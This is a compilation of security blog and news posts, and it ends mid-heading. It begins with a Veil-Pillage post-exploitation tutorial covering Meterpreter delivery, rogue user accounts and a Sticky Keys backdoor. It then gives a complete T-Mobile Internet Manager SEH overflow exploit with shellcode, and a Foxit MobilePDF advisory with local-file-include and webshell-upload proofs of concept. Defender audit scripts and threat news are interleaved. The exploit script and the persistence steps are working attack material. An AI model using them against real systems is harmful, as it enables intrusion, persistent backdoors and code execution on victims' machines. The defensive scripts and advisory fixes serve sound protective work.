To get remote desktop access to the victim machine and to enable remote desktop (if disabled), we have a useful module, “management/enable_rdp“.

To intercept traffic originating from the victim machine, a very useful management module is “management/enable_proxy“, which can be used to enable a system proxy that points to an attacker-controlled proxy machine. I have configured my Burp Suite to listen on 10.0.0.14:8080 as a proxy.

This module at present is showing an error message. But it is a very useful module which can be used to intercept all traffic. It will, however, show an error message for SSL websites, since the SSL certificate will fail to be validated by the victim’s web browser.

The Payload Delivery category contains those Veil-Pillage modules which can be used to upload and execute a specific payload like a Meterpreter executable or any Windows executable file. One of the modules of this category is “payload_delivery/exe_delivery”, which can be used to upload an executable file and execute it on the victim machine. For this demo I am generating a Meterpreter EXE file using Veil-Evasion (part of the Veil-Framework). In the below image, you can see Veil-Evasion has generated a Meterpreter EXE along with a resource file (.RC).

Configure the module to upload the generated EXE file and execute it on the victim machine:

After executing the EXE file, a cleanup file path is also shown, which we will use in just a minute. We can check out msfconsole, which we had earlier called using the resource file:

msfconsole -r /root/veil-output/handlers/veilmsf1_handler.rc

When we are done with the Meterpreter execution and want to clean up the files from the victim machine, we simply have to use the “cleanup” command from Veil-Pillage with the path to the cleanup script shown above:

cleanup /root/veil-output/pillage/exe_delivery/01.04.2015.224337.pc

The Persistence category consists of those modules which can help you maintain access to compromised machines. One helpful task to maintain access is to create a new user account. The “persistence/add_local_user” module can perform this task easily:

The user account has been created when this module is executed. And the best part is that you will also get a cleanup script to remove it when you want to. Use the “net users” command in the “management/run_command” module to get a user list, or the “credentials/hashdump” module to dump the user list and corresponding login hashes.

One of the old hacks but still a popular backdoor is the Sticky Keys hack. In this hack, the Sticky Keys executable “sethc.exe” (C:\Windows\System32) is backdoored or replaced by another EXE. When a user presses the SHIFT key 5 times, this executable is called. This hack has been automated in Veil-Pillage using the “persistence/sticky_keys” and “persistence/sticky_keys_exe” modules. The former will show a CMD when Sticky Keys is called, whereas the latter can be used to replace it with any other EXE of your choice like a Meterpreter EXE. One advantage of both these modules is that they have a cleanup script too, using which you can restore the original “sethc.exe” file.

The last category of Veil-Pillage is PowerSploit. The scripts in this category have already been covered in the “PowerShell Toolkit – PowerSploit” article. I request you to please refer to it.

Also note that one article is not enough to cover all the modules of Veil-Pillage. At the time of this writing, there were 60 modules. Many of the useful modules have been discussed here, but I have faith that you will try others if and when needed or for knowledge purposes.

Source
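The management and persistence modules described above leave a small, well-defined footprint on the victim: UAC switched off, Remote Desktop switched on, a system proxy pointing at the attacker, and a sethc.exe that is really cmd.exe or another EXE. As an added example from the defender's side (it is not part of Veil-Pillage or of this write-up), the Python script below audits a Windows host for exactly those changes. The registry locations are the standard Windows ones; the expected values, the comparison of sethc.exe against cmd.exe, and the optional known-good hash are this example's own assumptions.

```python
"""Audit a Windows host for the changes the Veil-Pillage management and
persistence modules make: UAC off, RDP on, a system proxy, a replaced
sethc.exe. Added example, not Veil-Pillage code."""
import hashlib
import os
import sys

INET_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"

# (hive, subkey, value name, expected value, finding text). The registry
# locations are the standard Windows ones; the expected values are this
# example's definition of a hardened posture (assumption).
REGISTRY_CHECKS = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "EnableLUA", 1, "UAC is disabled"),
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Terminal Server",
     "fDenyTSConnections", 1, "Remote Desktop connections are allowed"),
    ("HKCU", INET_KEY, "ProxyEnable", 0, "a system proxy is enabled"),
]


def evaluate_registry(values):
    """values maps (hive, subkey, name) -> observed value, None if absent.
    Returns a list of finding strings; an empty list means the posture
    matches REGISTRY_CHECKS and no proxy server is configured."""
    findings = []
    for hive, subkey, name, expected, text in REGISTRY_CHECKS:
        observed = values.get((hive, subkey, name))
        if observed != expected:
            findings.append(f"{text}: {hive}\\{subkey}\\{name} = {observed!r}")
    proxy = values.get(("HKCU", INET_KEY, "ProxyServer"))
    if proxy:
        findings.append(f"proxy server configured: {proxy}")
    return findings


def read_registry_values():
    """Read the values REGISTRY_CHECKS needs from the live registry
    (Windows only; winreg is in the standard library there)."""
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    wanted = [(h, k, n) for h, k, n, _, _ in REGISTRY_CHECKS]
    wanted.append(("HKCU", INET_KEY, "ProxyServer"))
    values = {}
    for hive, subkey, name in wanted:
        try:
            with winreg.OpenKey(hives[hive], subkey) as key:
                values[(hive, subkey, name)] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            values[(hive, subkey, name)] = None
    return values


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sticky_keys_finding(sethc_sha256, cmd_sha256, known_good_sha256=None):
    """Decide whether sethc.exe looks replaced. Identical to cmd.exe is the
    persistence/sticky_keys case; a mismatch against a known-good hash
    (assumed to come from a trusted baseline) catches any other EXE."""
    if sethc_sha256 == cmd_sha256:
        return "sethc.exe is identical to cmd.exe: Sticky Keys backdoor"
    if known_good_sha256 and sethc_sha256 != known_good_sha256:
        return "sethc.exe does not match the baseline hash"
    return None


def check_sticky_keys(system32_dir, known_good_sha256=None):
    sethc = os.path.join(system32_dir, "sethc.exe")
    cmd = os.path.join(system32_dir, "cmd.exe")
    if not (os.path.isfile(sethc) and os.path.isfile(cmd)):
        return None
    return sticky_keys_finding(sha256_of(sethc), sha256_of(cmd), known_good_sha256)


if __name__ == "__main__":
    if not sys.platform.startswith("win"):
        sys.exit("run this on the Windows host being audited")
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    findings = evaluate_registry(read_registry_values())
    sticky = check_sticky_keys(system32)
    if sticky:
        findings.append(sticky)
    print("\n".join(findings) or "no findings")
```

Run it as an administrator on the host; evaluate_registry and sticky_keys_finding are pure functions, so the same rules can be applied to values exported from another machine or checked in a unit test.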
-
KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity. Download: https://github.com/samyk/keysweeper
-
#!/usr/bin/python
# coding: utf-8
# Exploit Title: T-Mobile Internet Manager SEH Buffer Overflow
# Version: Internet Manager Software für Windows (TMO_PCV1.0.5B06)
# Software for usb Wireless: T-Mobile web'n'walk Stick Fusion
# Homepage: https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
# Software Link: https://www.t-mobile.de/downloads/neu/winui.zip
# Found: 8.01.2015
# Exploit Author: metacom - twitter.com/m3tac0m
# Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
# Video poc: http://bit.ly/17DhwSR

print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"

from struct import pack

junk = "\x41" * 18073
nseh = "\xeb\x06\x90\x90"
seh = pack('<I', 0x6900CEAE)  # 6900CEAE 5F POP EDI intl.dll
nops = "\x90" * 100

# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
# msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode = ("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")

header = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78" + junk + nseh + seh + nops + shellcode + '\n\n'

footer = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a"

exploit = header + footer
filename = "UpdateCfg.ini"
file = open(filename, "w")
file.write(exploit)
file.close()

Source
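The exploit above works by writing one overlong value into UpdateCfg.ini: the UpdateReport setting is followed by 18,073 bytes of padding, the SEH overwrite and the shellcode, none of which resembles a real configuration value. As an added example from the responder's side (it is not part of the exploit or of the vendor's software), the script below triages such a file and reports any value that is far longer than a legitimate setting or that contains non-printable bytes. The length limit, the accepted character set and the two sample files are constructed assumptions of this example.

```python
"""Triage check for an updater configuration file such as UpdateCfg.ini.
The exploit above places its overflow in a single INI value, so a file
whose values are implausibly long or contain non-printable bytes is
worth a second look. Added example, not part of the exploit."""
import sys

MAX_VALUE_LEN = 512                            # assumption: no real value is longer
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}    # printable ASCII plus tab


def scan_ini_bytes(data, max_value_len=MAX_VALUE_LEN):
    """Return a list of (line_no, key, reason) tuples for suspicious lines.
    Parsing is deliberately lenient: blank lines, [sections] and ; comments
    are skipped, and a non-blank line without '=' is itself reported."""
    findings = []
    for line_no, raw in enumerate(data.split(b"\n"), 1):
        line = raw.rstrip(b"\r")
        stripped = line.strip()
        if not stripped or stripped[:1] in (b"[", b";"):
            continue
        key, sep, value = line.partition(b"=")
        label = key.strip()[:32].decode("latin-1")
        if not sep:
            findings.append((line_no, label, "malformed line (no '=')"))
            continue
        if len(value) > max_value_len:
            findings.append((line_no, label,
                             f"value is {len(value)} bytes (limit {max_value_len})"))
        odd = sorted({b for b in value if b not in PRINTABLE})
        if odd:
            shown = ", ".join(f"0x{b:02x}" for b in odd[:5])
            findings.append((line_no, label, f"non-printable bytes in value: {shown}"))
    return findings


def scan_ini_file(path, max_value_len=MAX_VALUE_LEN):
    with open(path, "rb") as fh:
        return scan_ini_bytes(fh.read(), max_value_len)


# Constructed samples: a benign file using the keys visible in the exploit's
# header, and one whose UpdateReport value has the shape of an overflow
# (long padding followed by bytes outside printable ASCII).
BENIGN_INI = (b"[UPDATE]\r\nENABLE_UPDATE=1\r\nUPDATE_FREQUENCE=14\r\n\r\n"
              b"[Service]\r\nServicePort=443\r\nUPDATE_PATH=./download\r\n")
SUSPECT_INI = (b"[UPDATE]\r\nENABLE_UPDATE=1\r\n"
               b"UpdateReport=" + b"A" * 2000 + bytes([0x90, 0xEB]) + b"\r\n"
               b"[UpdateMode]\r\nModeSelectSys=1\r\n")

if __name__ == "__main__":
    targets = sys.argv[1:]
    results = [(p, scan_ini_file(p)) for p in targets] if targets else [
        ("benign sample", scan_ini_bytes(BENIGN_INI)),
        ("suspect sample", scan_ini_bytes(SUSPECT_INI))]
    for name, findings in results:
        print(f"{name}: {'clean' if not findings else ''}")
        for line_no, key, reason in findings:
            print(f"  line {line_no} [{key}]: {reason}")
```

With no arguments the script scans the two embedded samples; pass one or more file paths to scan real files. The parser is kept lenient on purpose so that it never rejects a file before the length and byte checks have run.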
-
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400

Release Date:
=============
2015-01-12

Vulnerability Laboratory ID (VL-ID):
====================================
1400

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. Share, store and synchronize PDF files.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Foxit Corporation
Product: MobilePDF - iOS Web Application (Wifi) 4.4.0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The local file include vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application.

The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script code to compromise the iOS app. The execution of the unauthorized local file or path request occurs in the index of documents module of the wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side of the affected iOS application.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components.

Vulnerable Method(s):
[+] POST

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename (name)

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

1.2
An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.

The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension `pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file extension and can access the webshell with elevated access rights to execute.

The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password. Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (app/device) and compromise of the http web-server.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

Proof of Concept (PoC):
=======================
1.1
The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Download and install the FoxIT MobilePDF iOS application
2. Surf to the Documents Index of the Wifi Server (http://localhost:8888)
3. Start to choose a file for the upload function by usage of the search
4. Intercept the session by usage of a tamper and change the name value to the local device path source
5. Continue the request and save the settings. After that go back to the Index of Documents
Note: The execution of the script code occurs in the vulnerable name value of the index file dir list
6. Successful reproduce of the security vulnerability!

PoC: Index of Documents (Name)

<tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td>
<td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] (File Include > Upload)---
Status: 200[OK]
POST http://localhost:8888/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[3624]
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3796507625132
Content-Disposition: form-data; name="button"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png"
Content-Type: image/png

--- PoC Session Logs [GET] (File Dir Index List)---
13:54:26.427[48ms][total 48ms]
Status: 200[OK]
GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!]
Load Flags[LOAD_NORMAL]
Größe des Inhalts[142]
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[142]
Date[Sa., 10 Jan. 2015 12:49:30 GMT]

Reference(s):
http://localhost:8888/
http://localhost:8888/%3C/./

1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: URL
http://localhost:8888/./webshell.png.html.php

PoC: Index of Documents

<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms]
Status: 200[OK]
POST http://localhost:8888/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[3883]
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png

Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php

Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be patched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. Restrict the filename input and filter with an own set exception to prevent application-side attacks. Parse also in the Index of Documents the vulnerable name output value to solve the issue.

1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions. Restrict the upload folder and disallow the execution of files that are already uploaded.

Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.9)

1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Source
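Both fixes in the Solution section above come down to the same two controls on the server side of the wifi interface: a strict policy for the `filename` value of the upload POST (no path components, no markup characters, exactly one permitted extension) and output encoding of that name wherever the Index of Documents renders it. The Python below is an added example that is not Foxit's code; it shows those controls in a form any small file-serving web application could reuse. The extension whitelist, the storage directory layout and the sample names in the usage are assumptions of this example.

```python
"""Upload filename policy and index rendering for a small file-serving
web interface like the MobilePDF wifi server. Added example, not Foxit's
code; the extension whitelist and the storage layout are assumptions."""
import html
import os
import re
from urllib.parse import quote

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "txt"}          # assumption
# stem of letters, digits, space, '_' and '-', then exactly one '.' and an extension
_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 _\-]{0,99}\.[A-Za-z0-9]{1,8}$")


class InvalidFilename(ValueError):
    """Raised when an uploaded filename violates the policy."""


def validate_upload_filename(raw):
    """Return the normalised basename to store the upload under, or raise.
    Rejects directory parts (./, ../, /, \\), anything outside a small
    character set (so no <, >, " or % that could become markup in the
    index) and more than one extension, e.g. pentest.png.html.php.js.aspx.png."""
    if not raw:
        raise InvalidFilename("empty filename")
    if "/" in raw or "\\" in raw:
        raise InvalidFilename("directory components are not allowed")
    if not _NAME_RE.fullmatch(raw):
        raise InvalidFilename("filename must be <stem>.<ext> using [A-Za-z0-9 _-]")
    stem, ext = raw.rsplit(".", 1)      # the regex guarantees exactly one '.'
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise InvalidFilename(f"extension .{ext} is not allowed")
    return f"{stem}.{ext}"


def is_valid_upload_filename(raw):
    try:
        validate_upload_filename(raw)
        return True
    except InvalidFilename:
        return False


def storage_path(upload_dir, safe_name):
    """Join the validated name to the upload directory and prove the result
    stays inside it. That directory should sit outside anything the server
    executes or interprets, which is the second fix the advisory asks for."""
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, safe_name))
    if os.path.dirname(target) != base:
        raise InvalidFilename("resolved path escapes the upload directory")
    return target


def index_row(name, size_bytes, mtime):
    """One row of the Index of Documents with every untrusted value encoded:
    percent-encoded inside the href, HTML-escaped as text."""
    href = html.escape(quote(name), quote=True)
    text = html.escape(name, quote=True)
    return (f'<tr><td><a href="/{href}">{text}</a></td>'
            f'<td align="center">file</td>'
            f'<td align="center"><span class="m">{html.escape(str(mtime))}</span></td>'
            f'<td align="center"><span class="s">{int(size_bytes)} B</span></td></tr>')


if __name__ == "__main__":
    # Constructed sample names: the advisory's two payload shapes and a benign upload.
    for candidate in ("report.PDF", "pentest.png.html.php.js.aspx.png", "./[x].png"):
        print(f"{candidate!r}: {'accepted' if is_valid_upload_filename(candidate) else 'rejected'}")
    print(index_row("<img src=x>.png", 538, "2015-01-10 13:49"))
```

The policy is allow-list based: rather than stripping dangerous characters from whatever arrives, it defines what a valid name looks like and rejects everything else, so a name built to survive a blacklist (several extensions, a leading `./`, an HTML tag) never reaches the filesystem. index_row encodes the name on output regardless, so a record that entered the store before the policy existed still renders harmlessly.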
-
Hackers are targeting enterprise companies with bogus, malware-laden patches purporting to come from Oracle. Antonella Giovannetti, Oracle's Proactive response team engineer, warned in a threat advisory that customers should be vigilant about the attacks. "Warning. It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages," read the advisory. The malware and the specific attack sites remain unknown, and Oracle had not responded to V3's request for further details at the time of publishing. Despite the lack of firm information on the threat, Giovannetti urged customers to take a variety of pre-emptive protective measures. "You probably already don't need to be told. However, please do not download these fixes as they are not authorised by us in any way and they are more than likely to be dangerous to your system," read the advisory. F-Secure security advisor Sean Sullivan told V3 that, while details about the attacks remain scarce, campaigns trying to infect companies using messages masquerading as legitimate updates are not uncommon. "Given the target-base - Oracle customers - I think I'd categorise this as a type of search engine optimisation [SEO] or watering hole attack. So not common, but not uncommon," he said. "We've seen lots of industries targeted in the last year or two. Sounds like the bad guys have done some SEO work to lure potential victims to legit-looking sites that offer 'patches'." Jason Steere, director of technology strategy at FireEye, mirrored Sullivan's suggestions, revealing that the firm sees similar attacks on a regular basis. "It's probably a crimeware or ransomware attack going for high-volume infection to sell on infected PCs to a bot," he told V3. "Very sadly, many end users believe what they see. It's just another week and another attack using fake update mechanisms. It's very common as it plays on the fear of end users."
Oracle's warning follows the discovery of several large-scale hack campaigns. Attackers managed to deface the US Central Command's Twitter and YouTube feeds on Monday. Source
-
Trend Micro researcher Kyle Wilhoit says the latest attacks on SCADA and industrial control networks are turning out to carry rather pedestrian banking Trojans, and have been on the rise since October 2014. Talking to DarkReading, Wilhoit said that rather than Stuxnet-style attacks, ne'er-do-wells are dropping banking Trojans into these networks disguised as updates to SCADA software. So far, the DarkReading piece says, he's seen the attack software disguised as Siemens' Simatic WinCC, GE Cimplicity, and Advantech device drivers.

Rising numbers of attacks on SCADA environments in recent years have put sysadmins on edge. Apart from the nation-state-level Stuxnet, there's been a growing number of bugs identified in SCADA software. Apart from generic bugs like Heartbleed and Poodle, which are inherited via popular libraries the vendors deploy, industrial systems also suffer from all-too-common problems like hard-coded passwords and remote-access bugs. The SCADA-specific Havex and BlackEnergy attacks also grabbed headlines in 2014.

That makes the banking Trojan more unexpected, Wilhoit said, adding: “The ultimate end goal here is probably not industrialised espionage, but to get banking credentials”. That, of course, assumes that there are industrial controllers whose owners allow operators to use them as bank login points.

Wilhoit adds that many industrial control systems use Windows as the human interface platform, and users in those environments don't seem particularly diligent at running anti-virus and other security software. He notes that a successful crimeware attack on a Windows-based industrial controller would be catastrophic even if it didn't make a steel plant explode: if, for example, someone deployed a Cryptolocker-based attack against the control system, it would be rendered unusable. “HMI systems are very finicky, so it doesn't take much to make these things fall over. Financial information could be stolen, but what if an [HMI] box drops inadvertently?” Wilhoit added. He will be detailing his findings at Miami's S4 ICS/SCADA conference next week.

Source
-
*Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Security Vulnerability*

*Domain:*
http://www.facebook.com

*Discover:*
Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/

*(1) General Vulnerabilities Description:*

